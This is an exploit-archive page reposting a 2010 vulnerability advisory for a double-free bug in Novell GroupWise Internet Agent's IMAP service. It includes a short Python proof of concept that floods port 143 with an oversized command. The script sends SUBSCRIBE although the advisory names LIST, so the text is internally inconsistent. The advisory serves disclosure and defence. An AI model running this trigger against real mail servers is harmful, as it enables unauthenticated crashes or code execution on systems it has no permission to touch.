exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution

Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution
Posted Nov 10, 2010
Authored by Francis Provencher

Novell Groupwise suffers from an Internet Agent IMAP LIST command remote code execution vulnerability.

tags | exploit, remote, imap, code execution
SHA-256 | de163bf78d636b4473ab7820066e425de60984121a4acf0fdc9a44e1dfda0548

Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution

Change Mirror Download
#####################################################################################

Application: {PRL} Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution Vulnerability
Platforms: Linux

Exploitation: Remote code execution

CVE Number: Pending

Novell TID: 7007151

ZeroDayInitiative: ZDI-10-242

Author: Francis Provencher (Protek Research Lab's)

Blog: http://www.protekresearchlab.com/

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


#####################################################################################

===============
1) Introduction
===============

Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The
company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell
NetWare; identity, security, and systems management solutions; and collaboration solutions,
such as Novell Groupwise and Novell Pulse. Novell was instrumental in making the Utah Valley a
focus for technology and software development. Novell technology contributed to the emergence
of local area networks, which displaced the dominant mainframe computing model and changed
computing worldwide. Today, a primary focus of the company is on developing open source software
for enterprise clients.

(http://en.wikipedia.org/wiki/Novell)

#####################################################################################

============================
2) Report Timeline
============================

2010-07-20 Vendor Contact by Tippingpoint
2010-11-08 Vendor release advisory


#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
of Novell Groupwise Internet Agent. Authentication is not required to exploit this vulnerability.

The flaw exists within the IMAP server component which listens by default on TCP port 143. When
handling an IMAP LIST command with a large parameter the process attempts to free the same memory
twice. A remote attacker can exploit this vulnerability to execute arbitrary code under the
context of the IMAP server.

#####################################################################################

===========
4) The Code
===========


#!/usr/bin/python
#
# Francis Provencher
# Protek Research Lab.
#
#


import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = '\x41' * 56000

s.connect(('192.168.100.177',143))
s.recv(1024)
s.send('A001 LOGIN test test \r\n')
s.recv(1024)
s.send('A001 SUBSCRIBE ' + buffer + '\r\n')
s.recv(1024)
s.close()


#####################################################################################
(PRL-2010-07)

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close